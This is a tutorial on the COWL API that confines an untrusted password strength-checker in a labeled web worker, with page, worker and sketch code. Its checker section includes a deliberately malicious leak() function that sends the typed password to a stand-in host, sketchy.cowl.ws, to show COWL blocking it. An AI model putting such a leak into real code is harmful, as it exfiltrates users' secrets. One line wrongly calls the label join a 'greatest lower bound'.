COWL case study: password strength-checker

This short, informal tutorial shows how you can use the COWL API to confine a library that computes on sensitive data. Specifically, we are going to build a page that uses a password strength-checker library. (You may find it useful to read the short example explanation on the COWL main page.) First, we are going to build the main page, which has the form and runs the checker; then we're going to implement the checker itself.

To follow along, you may want to browse the code on GitHub.

Main page [checker.html]

The implementation of the main page is pretty straightforward. We are going to use Bootstrap to make the form pretty and jQuery to simplify the form submission. Below is the markup for the password form:

```html
<form id="check">
  <!-- The form already uses id="check"; ids must be unique, so the div has none. -->
  <div class="form-group has-feedback">
    <label for="password">Password</label>
    <input type="text" class="form-control" id="password" autocomplete="off">
    <span id="response"></span>
  </div>
  <button id="submit" type="submit" class="btn btn-default"
          data-loading-text="checking...">check</button>
</form>
```

You can safely ignore the classes if you have not used Bootstrap before. Similarly, you can ignore the data-loading-text attribute; we're going to use it to change the button's text from check to checking... while the checker worker is being loaded and is still computing. Only four things are important:

- The form's id is check; we're going to use this to register a submit handler that takes the password and sends it to the checker.

- The password's id is password; we're going to use this to get the element's value.

- The button's id is submit; we're going to use this to override the button's text while the checker is still working.

- The form has a <span> element with id response; we're going to insert the checker's response here as a thumbs-up or thumbs-down icon, denoting that the password is strong or weak, respectively.

Let's now actually implement the form submit handler:

```javascript
$('#check').submit(function (event) {
  disableForm(); // Disable the form while the check runs

  // Get the current value typed into the password field:
  var password = $('#password').val();

  // Label the password; it's sensitive to the current origin:
  password = new LabeledBlob(password, window.location.origin);

  // Create a new context to execute the checker code in:
  var lchecker = new LWorker("http://sketchy.cowl.ws/examples/checker/checker.js");

  // Register a handler to receive messages from the worker:
  lchecker.onmessage = function (data) {
    if (data === 'ready') { // Checker is ready
      // Send the labeled password to the checker:
      lchecker.postMessage(password);
    } else { // Checker sent us the password strength
      enableForm(); // Enable the form again

      // Update our response element with an icon denoting the strength:
      if (data === 'strong') {
        showStrongIcon();
      } else {
        showWeakIcon();
      }
    }
  };

  // Don't submit the form as usual:
  event.preventDefault();
});
```

When the submit (check) button is clicked, this handler is invoked. First, the handler gets the password field's value and labels it. The labeled password is a LabeledBlob: the blob's label marks the data as sensitive to the current origin, and the protected blob content is the password itself.

Next, the checker code is loaded into a new LWorker context. Once it's done loading, the lchecker.onmessage handler is invoked with the 'ready' message, and our code simply sends the labeled password to the checker (via postMessage).

The same handler is called again with the actual password strength once the checker has performed the check. In this case, the handler re-enables the form and updates the response <span> element with the strength indicator icon. (That's what showStrongIcon and showWeakIcon do.)
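The page and the checker follow a small message protocol: the worker announces 'ready', the page replies with the labeled password, and the worker answers 'strong' or 'weak'. The sketch below models only that message order, using a hypothetical, synchronous, in-memory stand-in for LWorker (simulateCheck, page and worker are illustrative names, not COWL APIs). Real LWorker messages are asynchronous and carry labeled data, which this toy ignores.

```javascript
// Hypothetical, synchronous stand-in for the page <-> LWorker protocol.
// No COWL labels, threads or real postMessage are involved; this only
// models the order of messages: 'ready' -> password -> 'strong' | 'weak'.
function simulateCheck(password, isStrong) {
  const transcript = [];
  let verdict = null;

  // Plays the role of checker.js: handle the password, reply with a verdict.
  const worker = {
    onmessage(pw) {
      const reply = isStrong(pw) ? 'strong' : 'weak';
      transcript.push('worker -> page: ' + reply);
      page.onmessage(reply);
    },
  };

  // Plays the role of lchecker.onmessage in checker.html.
  const page = {
    onmessage(data) {
      if (data === 'ready') {
        transcript.push('page -> worker: <password>');
        worker.onmessage(password);
      } else {
        verdict = data; // the real page calls showStrongIcon/showWeakIcon here
      }
    },
  };

  // checker.js ends with postMessage('ready') once it has loaded.
  transcript.push('worker -> page: ready');
  page.onmessage('ready');
  return { verdict, transcript };
}

const run = simulateCheck('Passw0rd@', (pw) => /\d/.test(pw));
console.log(run.verdict);    // strong
console.log(run.transcript); // three messages, in protocol order
```

The placeholder strength test (/\d/) is only there to drive the simulation; the actual checker uses the regex fetched from the server.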



The example below shows the result executing the checker against a weak password:



And, a "stronger" password:

That's pretty much it for the main page! All the other code is boilerplate. If you are interested, though, you can browse it here.



Before delving into the checker code, there is one last thing that is worth highlighting: if we had not labeled -- as is done in today's web applications -- the password the checker could've easily have leaked it. As shown below the checker can simply encode the password in the query string of the request URL:

Here, the last request (that returns the 404 message) leaks the password to the server. Indeed, let's now implement a checker that while seemingly benign (it returns a correct result) attempts to leak information below.

Checker [checker.js]

Let's now implement the checker code. Our checker fetches a regular expression to use as a way of evaluating whether the password is strong or weak. An alternative approach may, for example, fetch a list of common passwords, etc.

As a starting point, let's define a helper function that simply fetches a regular expression from a remote server and calls a supplied callback once the server replies:

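```javascript
function fetchRegex(cb) {
  var fallback = /\w{6,}/; // default used whenever the remote regex is unusable
  try {
    var req = new XMLHttpRequest();
    req.open('GET', 'http://sketchy.cowl.ws/examples/checker/regex.json', true);
    req.responseType = 'json';
    req.onload = function () {
      // A 404 or malformed body leaves req.response without a regex field:
      if (req.status === 200 && req.response && req.response.regex) {
        cb(new RegExp(req.response.regex));
      } else {
        console.warn('Unexpected regex response (status %d)', req.status);
        cb(fallback);
      }
    };
    // Asynchronous network failures are reported here, not via the catch below:
    req.onerror = function () {
      console.warn('Failed to fetch regex: network error');
      cb(fallback);
    };
    req.send();
  } catch (e) {
    console.warn('Failed to fetch regex: %s', e);
    cb(fallback);
  }
}
```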

This code simply makes a request to sketchy.cowl.ws with XMLHttpRequest. Once the server replies with a JSON response, we convert it to a regular expression and invoke the cb callback. If anything fails (e.g., the server is down), we simply call the callback with a default regular expression.
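The fallback decision can be pulled out into a pure function and exercised without a network. The sketch below is hypothetical (regexFromResponse and DEFAULT_REGEX are illustrative names, not part of checker.js); it assumes the same JSON shape ({ "regex": ... }) and the same /\w{6,}/ default as fetchRegex, and additionally treats a pattern that RegExp rejects as a failure.

```javascript
// Hypothetical helper, not part of checker.js: the decision fetchRegex makes
// once a response has arrived, as a pure function so it can be tested offline.
const DEFAULT_REGEX = /\w{6,}/; // same default as fetchRegex

function regexFromResponse(status, body) {
  // Non-200 status, empty body, or a missing "regex" field: use the default.
  if (status !== 200 || !body || typeof body.regex !== 'string') {
    return DEFAULT_REGEX;
  }
  try {
    return new RegExp(body.regex);
  } catch (e) {
    // The server sent a string that is not a valid regular expression.
    return DEFAULT_REGEX;
  }
}

console.log(regexFromResponse(404, null) === DEFAULT_REGEX);          // true
console.log(regexFromResponse(200, { regex: '(' }) === DEFAULT_REGEX); // true
console.log(regexFromResponse(200, { regex: '^a+$' }).test('aaa'));   // true
```

Keeping the decision separate from the XHR plumbing makes it easy to check that every failure path ends in exactly one well-defined regex.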

In this example, when queried for regex.json, our server replies with the regex from here:

```json
{ "regex" : "((?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[@#$%]).{6,})" }
```

We additionally set a CORS header to make this resource publicly readable by any script.
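To see what this pattern demands, the sketch below parses the same JSON text and tests a few made-up sample passwords, much as fetchRegex and the checker do (minus the network and the labels). Note that JSON needs a doubled backslash to produce the regex escape for a digit. The pattern is built from lookaheads, so it requires at least one digit, one lowercase letter, one uppercase letter, one of @ # $ %, and at least six characters overall.

```javascript
// Parse the same JSON the server returns for regex.json. String.raw keeps
// the backslashes exactly as they appear in the JSON text.
const regexJson = String.raw`{ "regex" : "((?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[@#$%]).{6,})" }`;
const strongRegex = new RegExp(JSON.parse(regexJson).regex);
const fallbackRegex = /\w{6,}/; // fetchRegex's default

// Same test the checker performs before replying to the page.
function strength(regex, password) {
  return regex.test(password) ? 'strong' : 'weak';
}

console.log(strength(strongRegex, 'Passw0rd@'));  // strong
console.log(strength(strongRegex, 'password'));   // weak: no digit, uppercase or symbol
console.log(strength(strongRegex, 'Ab1@'));       // weak: shorter than six characters
console.log(strength(fallbackRegex, 'password')); // strong under the much laxer default
```

The last line shows why the fallback matters: if the fetch fails, "password" would be reported as strong.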

Let's now implement the code that interacts with the library user (the main page):

```javascript
// Wait for a message from the parent:
onmessage = function (password) {
  fetchRegex(function (regex) {
    // Raise the privacy label:
    COWL.privacyLabel = COWL.privacyLabel.and(password.privacy);

    // Now we can read the password
    console.log('Checking strength of: %s', password.blob);

    // But we cannot talk to the network arbitrarily.
    // We can still compute the strength and reply to the parent:
    postMessage(regex.test(password.blob) ? 'strong' : 'weak');
  });
};

// Tell the parent that we're done loading:
postMessage('ready');
```

What is this code doing? At the top level, it registers a message handler and sends a message to the parent (via postMessage) telling it we're ready to compute the strength of the password. The interesting bits are in the handler.

In the handler, we first fetch the regex (while the worker can still talk to the network freely) and then raise the context label:

```javascript
// Raise the privacy label:
COWL.privacyLabel = COWL.privacyLabel.and(password.privacy);
```



The right-hand side of the assignment computes a new label that corresponds to the join (or greatest lower bound) of the current label and the label of the blob (password.privacy). This label, when set, ensures that the privacy of both the password message and everything in score is protected. If we do not raise the context label as such, COWL would prevent the code from looking at the blob contents. In particular, we would not be able to print out the password to the console. COWL would throw the following exception:

Raising the label as such, however, allows us to inspect the password message content (the blob property), test it against the regex, and reply to the parent with either 'strong' or 'weak'.
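The effect of the join can be illustrated with a toy model. The sketch below is a simplification, not COWL's Label implementation: it treats a privacy label as a set of origins that must all be protected (a conjunction), so and() is set union, and labeled data may be read only by a context whose label protects at least the same origins. It assumes a fresh worker starts with the public (empty) label, and https://page.example is a hypothetical stand-in for the main page's origin. Real COWL labels are richer than this.

```javascript
// Toy model (not COWL's Label): a privacy label is a set of origins, read as
// a conjunction "origin1 AND origin2 ...". The empty set means public.
class ToyLabel {
  constructor(origins = []) {
    this.origins = new Set(origins);
  }

  // Join (least upper bound): protect the data of both labels.
  and(other) {
    return new ToyLabel([...this.origins, ...other.origins]);
  }

  // Data with this label may be read in a context labeled `ctx` only if the
  // context protects every origin this label protects.
  canFlowTo(ctx) {
    return [...this.origins].every((o) => ctx.origins.has(o));
  }

  toString() {
    return this.origins.size ? [...this.origins].sort().join(' AND ') : '(public)';
  }
}

const pageOrigin = 'https://page.example';       // hypothetical main-page origin
const passwordLabel = new ToyLabel([pageOrigin]); // plays the role of password.privacy
let contextLabel = new ToyLabel();                // assumed: the worker starts public

console.log(passwordLabel.canFlowTo(contextLabel)); // false: reading is refused
contextLabel = contextLabel.and(passwordLabel);     // like COWL.privacyLabel = ...and(...)
console.log(String(contextLabel));                  // https://page.example
console.log(passwordLabel.canFlowTo(contextLabel)); // true: the blob may now be read
```

Because the join only ever adds origins, raising is monotone: joining the same label again leaves the context label unchanged.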

Of course, that's not the whole story! Raising the label also prevents the code from communicating arbitrarily (since now it can look at more sensitive data, the password). Hence, for example, if we try to send the password content, COWL prevents the leak. Let's actually modify the onmessage handler to leak the password:

```javascript
...

// Now we can read the password
console.log('Checking strength of: %s', password.blob);

// But we cannot talk to the network arbitrarily.
// Let's try:
leak(password.blob);

...
```

Where the helper leak function is defined as:

```javascript
function leak(pass) {
  try {
    var req = new XMLHttpRequest();
    req.open('get', 'http://sketchy.cowl.ws/leak/yourpass=' + pass, true);
    req.send();
  } catch (e) {
    console.log("Failed to leak!");
  }
}
```



Running this code and looking at the network profiler, we see the block and no request being made to sketchy.cowl.ws:

This is great! Although the checker is malicious, we were still able to use it without leaking the password. Of course, you can imagine a less contrived example where the library you are trying to use accidentally leaks data to its author's remote server.

One final note: in the screenshot above, you may have noticed that the security error is a "Content Security Policy" violation. This is because COWL piggybacks on the existing CSP implementation. Indeed, raising the label amounted to changing the context's CSP to a more restrictive policy. Check out the paper for more details!
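As a rough illustration of how a label can translate into a CSP-style restriction, the sketch below maps a toy label (again, a set of origins read as a conjunction) to the destinations a context may still contact: anywhere while public, only the owning origin when one origin is protected, and nowhere when several are, since no single origin may see data belonging to all of them. The function names and the connect-src strings are illustrative assumptions, not the exact policy COWL installs, and https://page.example is again a hypothetical page origin.

```javascript
// Toy mapping (an assumption, not COWL's actual policy) from a privacy label,
// modelled as a list of origins read as a conjunction, to a CSP-like directive.
function connectSrcFor(labelOrigins) {
  const origins = [...new Set(labelOrigins)];
  if (origins.length === 0) return 'connect-src *';             // public
  if (origins.length === 1) return `connect-src ${origins[0]}`; // one owner
  return "connect-src 'none'"; // no single origin may receive everyone's data
}

// May a context with this label send a request to `destination`?
function mayConnect(labelOrigins, destination) {
  const origins = [...new Set(labelOrigins)];
  if (origins.length === 0) return true;
  return origins.length === 1 && origins[0] === destination;
}

const page = 'https://page.example';      // hypothetical main-page origin
const sketchy = 'http://sketchy.cowl.ws'; // where leak() sends the password

console.log(connectSrcFor([]));           // connect-src *
console.log(connectSrcFor([page]));       // connect-src https://page.example
console.log(mayConnect([], sketchy));     // true: before raising, fetchRegex works
console.log(mayConnect([page], sketchy)); // false: the leak request is blocked
```

This also shows why the checker fetches its regex before raising the label: once the label names the page's origin, requests to sketchy.cowl.ws are no longer allowed.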